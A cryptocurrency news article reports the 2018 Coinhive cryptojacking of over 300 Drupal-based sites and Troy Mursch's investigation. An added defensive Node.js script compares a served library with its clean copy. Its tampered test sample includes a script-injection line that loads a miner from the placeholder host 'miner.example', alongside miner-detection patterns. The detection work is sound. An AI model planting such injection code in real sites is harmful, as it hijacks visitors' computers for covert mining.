Cryptojacking Strikes Again! Hackers Target Government Websites to Mine Monero


Cryptojacking, the novel hacking technique that infects a victim’s computer with code to mine cryptocurrency, is evidently on the rise: hackers have targeted hundreds of popular websites with fraudulent software to mine the fungible digital coin monero (XMR).

“Cryptojacking” A Sophisticated Crime

In 2018 alone, thousands of users have fallen victim to malicious cryptojacking code. Surprisingly, it is not visiting a “shady” website that gets users “cryptojacked”: hackers are using sophisticated methods, such as masking and mimicking popular websites, to trap unsuspecting users.

The latest incident was unearthed by Bad Packets Report’s researcher Troy Mursch, who unveiled on May 5, 2018, that more than 300 websites have been targets of cryptojacking.

Once again, the infamous browser mining software Coinhive was compromised and used by hackers to mine the cryptocurrency monero, by exploiting an “outdated and vulnerable version” of the Drupal content management software.

According to the post, Mursch was notified about the “crypto-hacked” websites of the government of Chihuahua, Mexico, and San Diego Zoo, after which the cyber-security researcher sprang into action.

During his investigation, Mursch observed similar code in the JavaScript libraries of the affected websites. The code, contained in “/misc/jquery.once.js?v=1.2,” revealed the attacker’s Coinhive domain, where Mursch discovered a modified version of the popular mining software.

(Source: Bad Packets)
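As an added example (not code from the original article or from Bad Packets), the check below compares the served copy of a library such as jquery.once.js with the copy from a clean release and, on a mismatch, reports what the altered file contains. The function name `auditScript`, the sample file contents and the host `miner.example` are constructed for illustration; the clean copy is assumed to come from the site's own trusted release archive.

```javascript
'use strict';
const crypto = require('crypto');

const sha256 = (text) => crypto.createHash('sha256').update(text, 'utf8').digest('hex');

// Coinhive's default script name and the constructors of its browser API.
const MINER_MARKERS = [/coinhive\.min\.js/i, /\bCoinHive\.(?:Anonymous|User)\b/];
// Ways a static library can pull in another script at run time.
const LOADER_MARKERS = [/document\.write\s*\(/, /createElement\s*\(\s*['"]script['"]\s*\)/i];
// Absolute or protocol-relative URLs; capture group 1 is the host name.
const HOST_RE = /(?:https?:)?\/\/([a-z0-9-]+(?:\.[a-z0-9-]+)+)/gi;

// Compare a served library with its pristine copy and describe the difference.
// `allowedHosts` lists hosts the clean file is known to reference.
function auditScript(served, pristine, allowedHosts = []) {
  const findings = [];
  if (sha256(served) === sha256(pristine)) return findings; // byte-identical
  findings.push('hash-mismatch');
  const allowed = new Set(allowedHosts.map((h) => h.toLowerCase()));
  for (const match of served.matchAll(HOST_RE)) {
    const tag = `unexpected-host:${match[1].toLowerCase()}`;
    if (!allowed.has(match[1].toLowerCase()) && !findings.includes(tag)) findings.push(tag);
  }
  if (MINER_MARKERS.some((re) => re.test(served))) findings.push('miner-api');
  if (LOADER_MARKERS.some((re) => re.test(served))) findings.push('dynamic-script-loader');
  return findings;
}

// Constructed samples: a stand-in for the clean library, and the same file
// with a script loader appended. "miner.example" is a placeholder host.
const PRISTINE = '(function ($) { $.fn.once = function (id, fn) { return this; }; })(jQuery);\n';
const TAMPERED = PRISTINE +
  'var s = document.createElement("script");' +
  's.src = "//miner.example/lib/coinhive.min.js"; document.head.appendChild(s);\n';

console.log(auditScript(PRISTINE, PRISTINE));
console.log(auditScript(TAMPERED, PRISTINE));
```

The hash comparison is the part that holds up against an obfuscated payload; the marker checks only help triage a file that has already failed it.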

Later, by reverse-checking the suspected domain address on the IP-checker site WhoIs, Mursch was able to find the email address associated with the hackers, which he then used to search the web, using the details the sites had in common as search parameters.

Affected sites include the City of Marion, Ohio, the University of Aleppo, and the National Labor Relations Board, Mexico. The full list of affected sites can be accessed on this spreadsheet.

Attacks Possible Due to Coinhive’s JS Usage

Mursch believes that Coinhive is at the center of the majority of cryptojacking attacks because it is a JavaScript-based program that is easy to inject.

Speaking to CoinDesk, Mursch said:

“This is because Coinhive and other cryptojacking services (malware) are simply done with JavaScript. Every modern browser and device can run JavaScript, so as such, everybody can mine cryptocurrency and unfortunately Coinhive has been used and abused time and time again. [In] this particular case, Drupal users need to update [as soon as possible].”

Cryptojacking is an increasingly common cyber-nuisance, and hackers have employed a number of ways to extract money. Among them, as previously reported by BTCManager, are holding sensitive data to a cryptocurrency-only ransom and latching onto YouTube ads to infect computers.